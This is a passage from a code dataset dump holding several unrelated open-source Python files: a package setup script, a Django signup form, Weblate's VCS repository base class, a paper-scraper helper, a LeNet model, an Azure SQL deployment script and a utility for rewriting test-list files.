setuptools\n\nwith open('requirements.txt') as f:\n requirements = f.read().splitlines()\n\nwith open('imgbbpy/__init__.py') as f:\n version = re.search(r\"__version__ = '([\\d\\.]+)'\", f.read(), re.MULTILINE)[1] # type: ignore\n\nwith open('README.md') as f:\n readme = f.read()\n\nsetuptools.setup(\n name='imgbbpy',\n author='scrazzz',\n url='https://github.com/scrazzz/imgbbpy/',\n project_urls={\n 'Documentation': 'https://github.com/scrazzz/imgbbpy/blob/main/documentation.md',\n 'Issue tracker': 'https://github.com/scrazzz/imgbbpy/issues'\n },\n version=version,\n packages=['imgbbpy'],\n license='MIT',\n description='An Asynchronous and Synchronous API Wrapper for the Imgbb API.',\n long_description=readme,\n long_description_content_type='text/markdown',\n include_package_data=True,\n install_requires=requirements,\n python_requires='>=3.7.0'\n)\n","repo_name":"scrazzz/imgbbpy","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":913,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"52"} +{"seq_id":"18698056786","text":"from django import forms\n\nfrom bauth.validators.email_validator import validate_email\nfrom bauth.validators.phone_number_validator import validate_phone_number\n\n\nclass SocialSignupForm(forms.Form):\n first_name = forms.CharField(\n max_length=200, required=True,\n widget=forms.TextInput(attrs={\"readonly\": True})\n )\n last_name = forms.CharField(\n max_length=200, required=True,\n widget=forms.TextInput(attrs={\"readonly\": True})\n )\n email = forms.EmailField(\n max_length=200, validators=[validate_email], required=True,\n widget=forms.TextInput(attrs={\"class\": \"signup_field\", \"placeholder\": \"e.g someone@email.com\"})\n )\n phone = forms.CharField(\n max_length=200, validators=[validate_phone_number], required=True,\n widget=forms.TextInput(attrs={\"class\": \"signup_field\", \"placeholder\": \"1711111111\"})\n )\n is_verified = forms.BooleanField(widget=forms.HiddenInput(), required=True, initial=False)\n\n def __init__(self, *args, **kwargs):\n try:\n _first_name = kwargs.pop('first_name')\n _last_name = kwargs.pop('last_name')\n _email = kwargs.pop('email')\n _phone = kwargs.pop('phone')\n except:\n _first_name = False\n _last_name = False\n _email = False\n _phone = False\n super(SocialSignupForm, self).__init__(*args, **kwargs)\n self.fields['first_name'].widget.attrs['readonly'] = _first_name\n self.fields['last_name'].widget.attrs['readonly'] = _last_name\n if _email:\n self.fields['email'].widget.attrs['readonly'] = True\n self.fields['email'].widget.attrs['class'] = ''\n self.fields['is_verified'].initial = True\n if _phone:\n self.fields['phone'].widget.attrs['readonly'] = True\n self.fields['phone'].widget.attrs['class'] = ''\n","repo_name":"codenginebd/obr","sub_path":"bauth/forms/social_signup_form.py","file_name":"social_signup_form.py","file_ext":"py","file_size_in_byte":1895,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"10296966294","text":"from __future__ import annotations\n\nimport hashlib\nimport logging\nimport os\nimport os.path\nimport subprocess\nfrom typing import TYPE_CHECKING\n\nfrom dateutil import parser\nfrom django.core.cache import cache\nfrom django.utils.functional import cached_property\nfrom django.utils.translation import gettext_lazy\nfrom packaging.version import Version\n\nfrom weblate.trans.util import get_clean_env, path_separator\nfrom weblate.utils.errors import add_breadcrumb\nfrom weblate.utils.lock import WeblateLock\nfrom weblate.vcs.ssh import SSH_WRAPPER\n\nif TYPE_CHECKING:\n from collections.abc import Iterator\n from datetime import datetime\n\nLOGGER = logging.getLogger(\"weblate.vcs\")\n\n\nclass RepositoryError(Exception):\n \"\"\"Error while working with a repository.\"\"\"\n\n def __init__(self, retcode, message):\n super().__init__(message)\n self.retcode = retcode\n\n def get_message(self):\n if self.retcode != 0:\n return f\"{self.args[0]} ({self.retcode})\"\n return self.args[0]\n\n def __str__(self):\n return self.get_message()\n\n\nclass Repository:\n \"\"\"Basic repository object.\"\"\"\n\n _cmd = \"false\"\n _cmd_last_revision: list[str] | None = None\n _cmd_last_remote_revision: list[str] | None = None\n _cmd_status = [\"status\"]\n _cmd_list_changed_files: list[str] | None = None\n\n name = None\n identifier: str | None = None\n req_version: str | None = None\n default_branch = \"\"\n needs_push_url = True\n supports_push = True\n push_label = gettext_lazy(\"This will push changes to the upstream repository.\")\n\n _version = None\n\n @classmethod\n def get_identifier(cls):\n return cls.identifier or cls.name.lower()\n\n def __init__(\n self,\n path: str,\n branch: str | None = None,\n component=None,\n local: bool = False,\n skip_init: bool = False,\n ):\n self.path = path\n if branch is None:\n self.branch = self.default_branch\n else:\n self.branch = branch\n self.component = component\n self.last_output = \"\"\n base_path = self.path.rstrip(\"/\").rstrip(\"\\\\\")\n self.lock = WeblateLock(\n lock_path=os.path.dirname(base_path),\n scope=\"repo\",\n key=component.pk if component else os.path.basename(base_path),\n slug=os.path.basename(base_path),\n file_template=\"{slug}.lock\",\n timeout=120,\n )\n self._config_updated = False\n self.local = local\n if not local:\n # Create ssh wrapper for possible use\n SSH_WRAPPER.create()\n if not skip_init and not self.is_valid():\n self.init()\n\n @classmethod\n def get_remote_branch(cls, repo: str): # noqa: ARG003\n return cls.default_branch\n\n @classmethod\n def add_breadcrumb(cls, message, **data):\n add_breadcrumb(category=\"vcs\", message=message, **data)\n\n @classmethod\n def add_response_breadcrumb(cls, response):\n cls.add_breadcrumb(\n \"http.response\",\n status_code=response.status_code,\n text=response.text,\n headers=response.headers,\n )\n\n @classmethod\n def log(cls, message, level: int = logging.DEBUG):\n return LOGGER.log(level, \"%s: %s\", cls._cmd, message)\n\n def ensure_config_updated(self):\n \"\"\"Ensures the configuration is periodically checked.\"\"\"\n if self._config_updated:\n return\n cache_key = f\"sp-config-check-{self.component.pk}\"\n if cache.get(cache_key) is None:\n self.check_config()\n cache.set(cache_key, True, 86400)\n self._config_updated = True\n\n def check_config(self):\n \"\"\"Check VCS configuration.\"\"\"\n raise NotImplementedError\n\n def is_valid(self):\n \"\"\"Check whether this is a valid repository.\"\"\"\n raise NotImplementedError\n\n def init(self):\n \"\"\"Initialize the repository.\"\"\"\n raise NotImplementedError\n\n def resolve_symlinks(self, path):\n \"\"\"Resolve any symlinks in the path.\"\"\"\n # Resolve symlinks first\n real_path = path_separator(os.path.realpath(os.path.join(self.path, path)))\n repository_path = path_separator(os.path.realpath(self.path))\n\n if not real_path.startswith(repository_path):\n raise ValueError(\"Too many symlinks or link outside tree\")\n\n return real_path[len(repository_path) :].lstrip(\"/\")\n\n @staticmethod\n def _getenv():\n \"\"\"Generate environment for process execution.\"\"\"\n return get_clean_env(\n {\n \"GIT_SSH\": SSH_WRAPPER.filename,\n \"GIT_TERMINAL_PROMPT\": \"0\",\n \"SVN_SSH\": SSH_WRAPPER.filename,\n },\n extra_path=SSH_WRAPPER.path,\n )\n\n @classmethod\n def _popen(\n cls,\n args: list[str],\n cwd: str | None = None,\n merge_err: bool = True,\n fullcmd: bool = False,\n raw: bool = False,\n local: bool = False,\n stdin: str | None = None,\n ):\n \"\"\"Execute the command using popen.\"\"\"\n if args is None:\n raise RepositoryError(0, \"Not supported functionality\")\n if not fullcmd:\n args = [cls._cmd, *list(args)]\n text_cmd = \" \".join(args)\n kwargs = {}\n # These are mutually exclusive\n if stdin is not None:\n kwargs[\"input\"] = stdin\n else:\n kwargs[\"stdin\"] = subprocess.PIPE\n process = subprocess.run(\n args,\n cwd=cwd,\n env={} if local else cls._getenv(),\n stdout=subprocess.PIPE,\n stderr=subprocess.STDOUT if merge_err else subprocess.PIPE,\n text=not raw,\n check=False,\n **kwargs,\n )\n cls.add_breadcrumb(\n text_cmd,\n retcode=process.returncode,\n output=process.stdout,\n stderr=process.stderr,\n cwd=cwd,\n )\n if process.returncode:\n raise RepositoryError(\n process.returncode, process.stdout + (process.stderr or \"\")\n )\n return process.stdout\n\n def execute(\n self,\n args: list[str],\n needs_lock: bool = True,\n fullcmd: bool = False,\n merge_err: bool = True,\n stdin: str | None = None,\n ):\n \"\"\"Execute command and caches its output.\"\"\"\n if needs_lock:\n if not self.lock.is_locked:\n raise RuntimeError(\"Repository operation without lock held!\")\n if self.component:\n self.ensure_config_updated()\n is_status = args[0] == self._cmd_status[0]\n try:\n self.last_output = self._popen(\n args,\n self.path,\n fullcmd=fullcmd,\n local=self.local,\n merge_err=merge_err,\n stdin=stdin,\n )\n except RepositoryError as error:\n if not is_status and not self.local:\n self.log_status(error)\n raise\n return self.last_output\n\n def log_status(self, error):\n try:\n self.log(f\"failure {error}\")\n self.log(self.status())\n except RepositoryError:\n pass\n\n def clean_revision_cache(self):\n if \"last_revision\" in self.__dict__:\n del self.__dict__[\"last_revision\"]\n if \"last_remote_revision\" in self.__dict__:\n del self.__dict__[\"last_remote_revision\"]\n\n @cached_property\n def last_revision(self):\n \"\"\"Return last local revision.\"\"\"\n return self.get_last_revision()\n\n def get_last_revision(self):\n return self.execute(self._cmd_last_revision, needs_lock=False, merge_err=False)\n\n @cached_property\n def last_remote_revision(self):\n \"\"\"Return last remote revision.\"\"\"\n return self.execute(\n self._cmd_last_remote_revision, needs_lock=False, merge_err=False\n )\n\n @classmethod\n def _clone(cls, source: str, target: str, branch: str):\n \"\"\"Clone repository.\"\"\"\n raise NotImplementedError\n\n @classmethod\n def clone(cls, source: str, target: str, branch: str, component=None):\n \"\"\"Clone repository and return object for cloned repository.\"\"\"\n repo = cls(target, branch, component, skip_init=True)\n with repo.lock:\n cls._clone(source, target, branch)\n return repo\n\n def update_remote(self):\n \"\"\"Update remote repository.\"\"\"\n raise NotImplementedError\n\n def status(self):\n \"\"\"Return status of the repository.\"\"\"\n return self.execute(self._cmd_status, needs_lock=False)\n\n def push(self, branch):\n \"\"\"Push given branch to remote repository.\"\"\"\n raise NotImplementedError\n\n def unshallow(self):\n \"\"\"Unshallow working copy.\"\"\"\n return\n\n def reset(self):\n \"\"\"Reset working copy to match remote branch.\"\"\"\n raise NotImplementedError\n\n def merge(\n self, abort: bool = False, message: str | None = None, no_ff: bool = False\n ):\n \"\"\"Merge remote branch or reverts the merge.\"\"\"\n raise NotImplementedError\n\n def rebase(self, abort=False):\n \"\"\"Rebase working copy on top of remote branch.\"\"\"\n raise NotImplementedError\n\n def needs_commit(self, filenames: list[str] | None = None):\n \"\"\"Check whether repository needs commit.\"\"\"\n raise NotImplementedError\n\n def count_missing(self):\n \"\"\"Count missing commits.\"\"\"\n return len(\n self.log_revisions(self.ref_to_remote.format(self.get_remote_branch_name()))\n )\n\n def count_outgoing(self):\n \"\"\"Count outgoing commits.\"\"\"\n return len(\n self.log_revisions(\n self.ref_from_remote.format(self.get_remote_branch_name())\n )\n )\n\n def needs_merge(self):\n \"\"\"\n Check whether repository needs merge with upstream.\n\n It is missing some revisions.\n \"\"\"\n return self.count_missing() > 0\n\n def needs_push(self):\n \"\"\"\n Check whether repository needs push to upstream.\n\n It has additional revisions.\n \"\"\"\n return self.count_outgoing() > 0\n\n def _get_revision_info(self, revision):\n \"\"\"Return dictionary with detailed revision information.\"\"\"\n raise NotImplementedError\n\n def get_revision_info(self, revision):\n \"\"\"Return dictionary with detailed revision information.\"\"\"\n key = f\"rev-info-{self.get_identifier()}-{revision}\"\n result = cache.get(key)\n if not result:\n result = self._get_revision_info(revision)\n # Keep the cache for one day\n cache.set(key, result, 86400)\n\n # Parse timestamps into datetime objects\n for name, value in result.items():\n if \"date\" in name:\n result[name] = parser.parse(value)\n\n return result\n\n @classmethod\n def is_configured(cls):\n return True\n\n @classmethod\n def validate_configuration(cls) -> list[str]:\n return []\n\n @classmethod\n def is_supported(cls):\n \"\"\"Check whether this VCS backend is supported.\"\"\"\n try:\n version = cls.get_version()\n except Exception:\n return False\n return cls.req_version is None or Version(version) >= Version(cls.req_version)\n\n @classmethod\n def get_version(cls):\n \"\"\"Cached getting of version.\"\"\"\n if cls._version is None:\n try:\n cls._version = cls._get_version()\n except Exception as error:\n cls._version = error\n if isinstance(cls._version, Exception):\n raise cls._version\n return cls._version\n\n @classmethod\n def _get_version(cls):\n \"\"\"Return VCS program version.\"\"\"\n return cls._popen([\"--version\"], merge_err=False)\n\n def set_committer(self, name, mail):\n \"\"\"Configure committer name.\"\"\"\n raise NotImplementedError\n\n def commit(\n self,\n message: str,\n author: str | None = None,\n timestamp: datetime | None = None,\n files: list[str] | None = None,\n ) -> bool:\n \"\"\"Create new revision.\"\"\"\n raise NotImplementedError\n\n def remove(self, files: list[str], message: str, author: str | None = None):\n \"\"\"Remove files and creates new revision.\"\"\"\n raise NotImplementedError\n\n @staticmethod\n def update_hash(objhash, filename, extra=None):\n if os.path.islink(filename):\n objtype = \"symlink\"\n data = os.readlink(filename).encode()\n else:\n objtype = \"blob\"\n with open(filename, \"rb\") as handle:\n data = handle.read()\n if extra:\n objhash.update(extra.encode())\n objhash.update(f\"{objtype} {len(data)}\\0\".encode(\"ascii\"))\n objhash.update(data)\n\n def get_object_hash(self, path):\n \"\"\"\n Return hash of object in the VCS.\n\n For files in a way compatible with Git (equivalent to git ls-tree HEAD), for\n dirs it behaves differently as we do not need to track some attributes (for\n example permissions).\n \"\"\"\n real_path = os.path.join(self.path, self.resolve_symlinks(path))\n objhash = hashlib.sha1(usedforsecurity=False)\n\n if os.path.isdir(real_path):\n files = []\n for root, _unused, filenames in os.walk(real_path):\n for filename in filenames:\n full_name = os.path.join(root, filename)\n files.append((full_name, os.path.relpath(full_name, self.path)))\n for filename, name in sorted(files):\n self.update_hash(objhash, filename, name)\n else:\n self.update_hash(objhash, real_path)\n\n return objhash.hexdigest()\n\n def configure_remote(\n self, pull_url: str, push_url: str, branch: str, fast: bool = True\n ):\n \"\"\"Configure remote repository.\"\"\"\n raise NotImplementedError\n\n def configure_branch(self, branch):\n \"\"\"Configure repository branch.\"\"\"\n raise NotImplementedError\n\n def describe(self):\n \"\"\"Verbosely describes current revision.\"\"\"\n raise NotImplementedError\n\n def get_file(self, path, revision):\n \"\"\"Return content of file at given revision.\"\"\"\n raise NotImplementedError\n\n @staticmethod\n def get_examples_paths():\n \"\"\"Generator of possible paths for examples.\"\"\"\n yield os.path.join(os.path.dirname(os.path.dirname(__file__)), \"examples\")\n\n @classmethod\n def find_merge_driver(cls, name):\n for path in cls.get_examples_paths():\n result = os.path.join(path, name)\n if os.path.exists(result):\n return os.path.abspath(result)\n return None\n\n @classmethod\n def get_merge_driver(cls, file_format):\n merge_driver = None\n if file_format == \"po\":\n merge_driver = cls.find_merge_driver(\"git-merge-gettext-po\")\n if merge_driver is None or not os.path.exists(merge_driver):\n return None\n return merge_driver\n\n def cleanup(self):\n \"\"\"Remove not tracked files from the repository.\"\"\"\n raise NotImplementedError\n\n def log_revisions(self, refspec):\n \"\"\"\n Log revisions for given refspec.\n\n This is not universal as refspec is different per vcs.\n \"\"\"\n raise NotImplementedError\n\n def list_changed_files(self, refspec: str) -> list:\n \"\"\"\n List changed files for given refspec.\n\n This is not universal as refspec is different per vcs.\n \"\"\"\n lines = self.execute(\n [*self._cmd_list_changed_files, refspec], needs_lock=False, merge_err=False\n ).splitlines()\n return list(self.parse_changed_files(lines))\n\n def parse_changed_files(self, lines: list[str]) -> Iterator[str]:\n \"\"\"Parses output with changed files.\"\"\"\n raise NotImplementedError\n\n def get_changed_files(self, compare_to: str | None = None):\n \"\"\"Get files missing upstream or changes between revisions.\"\"\"\n if compare_to is None:\n compare_to = self.get_remote_branch_name()\n\n return self.list_changed_files(self.ref_to_remote.format(compare_to))\n\n def get_remote_branch_name(self):\n return f\"origin/{self.branch}\"\n\n def list_remote_branches(self):\n return []\n","repo_name":"WeblateOrg/weblate","sub_path":"weblate/vcs/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":16520,"program_lang":"python","lang":"en","doc_type":"code","stars":3905,"dataset":"github-code","pt":"52"} +{"seq_id":"38096510366","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sat Jun 4 15:25:49 2022\r\n\r\nThis module calls the individual scrapers and combines the results. If more scrapers are to be added this\r\nmodule will need to be updated\r\n\r\n@author: paulo\r\n\"\"\"\r\n\r\nimport pandas as pd\r\nimport scrape_pubmed\r\nimport scrape_scidirect\r\nimport scraped_processing\r\n\r\ndef init(config):\r\n \r\n if config['url_query_pubmed']:\r\n resPubmed = scrape_pubmed.scrape_control(url=config['url_query_pubmed'])\r\n \r\n if config['url_query_science_direct']:\r\n resSciDirect = scrape_scidirect.scrape_control(url=config['url_query_science_direct'])\r\n \r\n df = scraped_processing.main()\r\n \r\n if config['required_terms']:\r\n df = required_terms_logic(config, df)\r\n \r\n df.to_excel('Final result.xlsx', sheet_name='combined_result', index=False)\r\n \r\n return {'df':df,\r\n 'resPubmed':resPubmed,\r\n 'resSciDirect':resSciDirect}\r\n \r\n\r\n# You may update or change this logic\r\n# Separate with , to form a group of any words that should be in\r\n# Separete with ; to form a group of group of required any words that should be in\r\n# Fields to be searched are: TITLE, ABSTRACT, KEYWORDS\r\ndef required_terms_logic(config, df, columns=['TITLE', 'ABSTRACT', 'KEYWORDS']):\r\n \r\n if ';' in config['required_terms']:\r\n required_groups = config['required_terms'].split(';')\r\n \r\n required_groups = [list_strip(grp.split(',')) for grp in required_groups]\r\n \r\n else:\r\n required_groups = [list_strip( config['required_terms'].split(',') ) ]\r\n \r\n terms_query = '('+') AND ('.join([' OR '.join(grp) for grp in required_groups]) +')'\r\n print('FYI filter query to combined results:', terms_query)\r\n \r\n def filter_applier(X, columns=columns):\r\n text = ' '.join(X[col] for col in columns)\r\n \r\n for grp in required_groups:\r\n grp_ok = False\r\n for term in grp:\r\n if term in text:\r\n grp_ok = True\r\n break\r\n if not grp_ok:\r\n return False\r\n \r\n return True\r\n \r\n return df[df.apply(filter_applier, axis=1)]\r\n \r\n \r\ndef list_strip(lis):\r\n return [st.strip() for st in lis]\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"paulo-jgf/sci-scraper","sub_path":"assistant.py","file_name":"assistant.py","file_ext":"py","file_size_in_byte":2300,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"27686352938","text":"class Solution:\n def nextGreaterElement(self, nums1: List[int], nums2: List[int]) -> List[int]:\n l =[]\n for i in range(len(nums1)):\n lar = nums1[i]\n ind = nums2.index(nums1[i])\n for j in range(ind+1,len(nums2)):\n if lar RELU => POOL block\n model.add(Conv2D(20, (5, 5), padding_type = \"same\", name = \"conv_1\"))\n model.add(ReLU(name = \"relu_1\"))\n model.add(MaxPooling2D(kernel_size = (2, 2), stride = (2, 2), name = \"pool_1\"))\n\n # second CONV => RELU => POOL block\n model.add(Conv2D(50, (5, 5), padding_type = \"same\", name = \"conv_2\"))\n model.add(ReLU(name = \"relu_2\"))\n model.add(MaxPooling2D(kernel_size = (2, 2), stride = (2, 2), name = \"pool_2\"))\n\n # first and only set of FC => RELU layers\n model.add(Flatten(name = \"flatten\"))\n model.add(Dense(500, name = \"fc_1\"))\n model.add(ReLU(name = \"relu_3\"))\n\n # softmax classifier\n model.add(Dense(classes, name = \"fc_2\"))\n model.add(Softmax(name = \"softmax\"))\n\n # return the constructed network architecture\n return model","repo_name":"iamVarunAnand/CNNs-from-Scratch","sub_path":"conv/lenet.py","file_name":"lenet.py","file_ext":"py","file_size_in_byte":1445,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"31025084009","text":"#!/usr/bin/env python\nimport os.path\nimport sys\nimport pdb\nimport os.path\nimport json\nimport random\nimport pyodbc\nimport dns.resolver\n#from haikunator import Haikunator\nfrom azure.common.credentials import ServicePrincipalCredentials\nfrom azure.mgmt.resource import ResourceManagementClient\nfrom azure.mgmt.resource.resources.models import DeploymentMode\nfrom azure.mgmt.network import NetworkManagementClient\n\ndef print_log(msg):\n print(\"CLIQR_EXTERNAL_SERVICE_LOG_MSG_START\")\n print(msg)\n print(\"CLIQR_EXTERNAL_SERVICE_LOG_MSG_END\")\n\ndef print_error(msg):\n print(\"CLIQR_EXTERNAL_SERVICE_ERR_MSG_START\")\n print(msg)\n print(\"CLIQR_EXTERNAL_SERVICE_ERR_MSG_END\")\n\ndef print_ext_service_result(msg):\n print(\"CLIQR_EXTERNAL_SERVICE_RESULT_START\")\n print(msg)\n print(\"CLIQR_EXTERNAL_SERVICE_RESULT_END\")\n\ncmd = sys.argv[1]\n\n# Dict that maps keys of CloudCenter's region names to values of Azure's region names.\n# Used below to control where something is deployed\nregionmap = {\n \"us-west\": \"westus\",\n \"us-southcentral\": \"southcentralus\",\n \"us-east\": \"eastus\"\n}\n\n# Set variable from service and custom parameters\nclient_id = os.environ['CliqrCloud_ClientId']\nsecret = os.environ['CliqrCloud_ClientKey']\ntenant = os.environ['CliqrCloud_TenantId']\nsubscriptionId = os.environ['CliqrCloudAccountId']\nazureRegion = regionmap[os.environ['region']]\nrootPass = os.environ['cliqrDatabaseRootPass']\nrootUser = os.environ['cliqrDatabaseRootUserName']\nmasterDB = \"master\"\nserverName = \"server-\"+os.environ['currentTierJobId'].replace('_', '-') # Replase _ with - because _ not allowed in server name. Use current tier to ensure uniqueness when multiple are present in app profile.\nmy_resource_group = os.environ['parentJobName']+os.environ['parentJobId'] # the resource group for deployment. Set from job name/id to make it identifiable and unique per deployment.\nport = \"1433\"\n# my_subscription_id = os.environ.get('AZURE_SUBSCRIPTION_ID') # your Azure Subscription Id\n\n\nprint_log(\"Resource Group: {}\".format(my_resource_group))\n\ncredentials = ServicePrincipalCredentials(\n client_id=client_id,\n secret=secret,\n tenant=tenant\n)\n\nprint_log(\"Creating ARM client and network client\")\nclient = ResourceManagementClient(credentials, subscriptionId)\nnetwork_client = NetworkManagementClient(credentials, subscriptionId)\n\nif cmd == \"start\":\n print_log(\"Initiation service start.\")\n\n print_log(\"Beginning the deployment...\")\n\n client.resource_groups.create_or_update(\n my_resource_group,\n {\n 'location': azureRegion\n }\n )\n try:\n print_log(\"Trying to open template downloaded to: template.json\")\n with open('template.json', 'r') as template_file_fd:\n template = json.load(template_file_fd)\n except Exception as err:\n print_log(\"Error opening template: {0}.\".format(err))\n sys.exit(1)\n\n print_log(\"SQL Server name set to: {0}.\".format(serverName))\n\n parameters = {\n \"parameters\": {\n \"serverAdminPassword\": {\n \"value\": rootPass\n },\n \"serverAdminUsername\": {\n \"value\": rootUser\n },\n \"server_name\": {\n \"value\": serverName\n }\n }\n }\n\n deployment_properties = {\n 'mode': DeploymentMode.incremental,\n 'template': template,\n 'parameters': parameters['parameters']\n }\n\n try:\n print_log(\"Trying to deploy database server to resource group {}.\".format(my_resource_group))\n deployment_async_operation = client.deployments.create_or_update(\n my_resource_group,\n 'azure-sample',\n deployment_properties\n )\n deployment_async_operation.wait()\n except Exception as err:\n print_log(\"Error deploying database: {0}.\".format(err))\n sys.exit(1)\n\n if 'cliqrDBSetupScript' in os.environ and len(os.environ['cliqrDBSetupScript']) > 0:\n print_log(\"Specified DB Setup Script downloaded to: {}. Running it...\".format(os.environ['cliqrDBSetupScript']))\n try:\n cnxn = pyodbc.connect(\n \"Driver={driver};Server=tcp:{serverName}.database.windows.net,{port};Database={masterDB};Uid={rootUser}@{serverName};Pwd={rootPass};Encrypt=yes;TrustServerCertificate=no;Connection Timeout=30;\".format(\n serverName=serverName,\n masterDB=masterDB,\n rootUser=rootUser,\n rootPass=rootPass,\n driver=\"ODBC Driver 13 for SQL Server\",\n port=port\n ),\n autocommit=True\n )\n cursor = cnxn.cursor()\n with open(os.environ['cliqrDBSetupScript'], 'r') as dbScript:\n cursor.execute(dbScript.read())\n except Exception as err:\n print_log(\"Error running DB Setup Scrip: {0}.\".format(err))\n sys.exit(1)\n domainName = serverName+\".database.windows.net\"\n answer = dns.resolver.query(domainName)\n ipAddr = str(answer[0].to_text())\n result = {\n 'hostName': domainName,\n 'ipAddress': ipAddr,\n 'environment': {\n 'instanceName': \"instanceName\",\n 'instanceType': \"instanceType\",\n 'serviceType': \"serviceType\",\n 'productType': \"productType\",\n 'status': \"status\",\n 'port': port,\n 'version': \"version\"\n }\n }\n\n print_log(json.dumps(result))\n print_ext_service_result(json.dumps(result))\n\n print_log(\"Done deploying!\")\nelif cmd == \"stop\":\n # pass\n # Destroy the resource group which contains the deployment\n try:\n print_log(\"Trying to delete the resource group: {0}.\".format(my_resource_group))\n client.resource_groups.delete(my_resource_group)\n except Exception as err:\n print_log(\"Error deleting the resource group: {0}.\".format(err))\n sys.exit(1)\n print_log(\"Resource Group {} deleted\".format(my_resource_group))\nelif cmd == \"reload\":\n pass\n","repo_name":"datacenter/cloudcenter-content","sub_path":"services/sqlserverpaas/sqlserverpaas-arm.py","file_name":"sqlserverpaas-arm.py","file_ext":"py","file_size_in_byte":6053,"program_lang":"python","lang":"en","doc_type":"code","stars":31,"dataset":"github-code","pt":"52"} +{"seq_id":"39343556617","text":"#!/usr/bin/env python2.7\n#from __future__ import division\n# -*- coding: utf-8 -*-\n########################################################\n# change_pclmsi_list is used for modifying the pclmsi.list\n#\n########################################################\nimport sys, os, logging, re, signal, subprocess\nfrom optparse import OptionParser\nfrom logging import info,debug,error,warning,critical\nfrom operator import eq\nglobal run_pclmsi_p\n\n#########################################Sub route##################################\ndef Sigint_handler(signal, frame):\n critical(\"Ctrl+C pressed and Exit!!!\")\n run_pclmsi_p.kill()\n sys.exit(0)\ndef Sigstop_handler(signal, frame):\n global run_pclmsi_p\n run_pclmsi_p.kill()\n sys.exit(0)\n#########################################MAIN#######################################\nsignal.signal(signal.SIGINT,Sigint_handler)\nsignal.signal(signal.SIGTERM,Sigstop_handler)\nparser = OptionParser(usage=\"%prog arg1 arg2\", version=\"%prog 0.1\") #2016-01-15 version 0.2\nparser.add_option(\"-f\",\"--file\", dest=\"list_file\", help=\"The pclmsi list file\", default = \"None\", type = \"str\")\nparser.add_option(\"--rerun\", dest=\"rerun_times\", help=\"change pclmsi list rerun_times\", default = -1, type = \"int\")\nparser.add_option(\"-p\",\"--path\", dest=\"files_path\", help=\"change pclmsi list path\", default = \"Not Change\", type = \"str\")\nparser.add_option(\"-c\", dest=\"core_ratio\", help=\"set core ratio(only 8 - 15 is available), don't use this parameter if you want the default core ratio\", default = 0, type = \"float\")\nparser.add_option(\"-l\", dest=\"log_level\", help=\"set log level, 0:no_log; 1:normal; 2:log_name. [default:%default]\", default = 0, type = \"int\")\nparser.add_option(\"--name\", dest=\"log_name\", help=\"when log level = 2, set log name\", default = \"None\", type = \"str\")\nparser.add_option(\"--debug\", dest=\"_debug\", help=\"Enable the debug mode for change_pclmsi_list\", action=\"store_true\", default = False)\nparser.add_option(\"-r\", dest=\"enable_run_pclmsi\", help=\"Enable run_pclmsi\", action=\"store_true\", default = False)\nparser.add_option(\"-d\", dest=\"device_num\", help=\"set device num\", default = 0, type = \"int\")\n(option, additions) = parser.parse_args(sys.argv[1:])\nif len(sys.argv[1:]) == 0:\n error(\"No parameters! Please use -h\")\n sys.exit()\nif eq(option.list_file,\"None\"):\n error(\"You must input a list file!\")\n sys.exit()\nif option._debug == True: plevel = logging.DEBUG #plevel is the print information level\nelse: plevel = logging.INFO\nlogging.basicConfig(level=plevel, format=\"%(asctime)s %(filename)10s[line:%(lineno)6d] %(levelname)8s: %(message)s\",datefmt=\"%a, %d %b %Y %H:%M:%S\", stream=sys.stdout)\npath = os.path.abspath(\".\")\nlist_file_full_path = os.path.join(path,option.list_file)\n(new_file_path, new_list_file) = os.path.split(list_file_full_path)\nnew_list_file = \"new_\"+ new_list_file\nnew_list_file_full_path = os.path.join(new_file_path,new_list_file)\n#info(new_list_file_full_path)\nnew_file = \"\"\nwith open(list_file_full_path,\"r\") as f_old:\n while True:\n line = f_old.readline()\n new_line = \"\"\n if line: \n line = line.strip()\n line = line.split()[0]\n m = re.match(r\"\\+load:\",line)\n if m:\n m = re.match(r\"\\+load:(.*)\",line)\n if m:\n if eq(option.files_path,\"Not Change\"):\n ic_file = m.group(1)\n else:\n ic_file = option.files_path + \"/\" + m.group(1).split('/')[-1]\n #info(ic_file)\n else:\n if eq(option.files_path,\"Not Change\"):\n ic_file = line\n else:\n ic_file = option.files_path + \"/\" + line.split('/')[-1]\n #info(ic_file)\n new_line = \"+load:\"+ ic_file\n if option.rerun_times != -1:\n new_rerun_times = \" +rerun_times:\"+str(option.rerun_times)\n new_line = new_line + new_rerun_times\n new_line = new_line + \" +ignore_all_checks:1\"\n if not option.core_ratio == 0:\n if option.core_ratio <= 15 and option.core_ratio >= 8:\n new_line = new_line + \" +clkRatio:%.1f\"%(option.core_ratio/2.0)\n info(new_line)\n else:\n error(\"Invalidate pstate!\")\n new_file = new_file + new_line + \"\\n\"\n else:\n break;\n \nwith open(new_list_file_full_path,\"w\") as f_new:\n f_new.write(new_file)\n \nos.system(\"mv -f %s %s\"%(list_file_full_path,list_file_full_path+\".org\"))\nos.system(\"mv -f %s %s\"%(new_list_file_full_path,list_file_full_path))\ninfo(\"update %s\"%(list_file_full_path))\nif option.log_level > 2 or option.log_level < 0:\n error(\"Invalidate log level!\")\n sys.exit() \nif eq(option.log_name, \"None\"):\n if option.log_level == 0:\n log_cmd = \"+no_log:1\"\n elif option.log_level == 1:\n log_cmd = \"\"\n else:\n error(\"When log level is 2, you must set log name\")\n sys.exit()\nelse:\n if option.log_level == 2:\n log_cmd = \"+log_name:%s\"%(option.log_name)\n else:\n error(\"When log level is not 2, you must not set log name\")\n sys.exit()\nif option.enable_run_pclmsi == True:\n run_pclmsi_location = os.getenv(\"LOCATION_RUN_PCLMSI\")\n run_pclmsi_cmd = \"%s +device:%d +avpl:%s %s\"%(run_pclmsi_location,option.device_num,list_file_full_path,log_cmd)\n info(\"%s +device:%d +avpl:%s %s\"%(run_pclmsi_location,option.device_num,list_file_full_path,log_cmd))\n run_pclmsi_p = subprocess.Popen(run_pclmsi_cmd,stdout=None, stderr=None, shell=True)\n ret = run_pclmsi_p.poll()\n while ret == None:\n 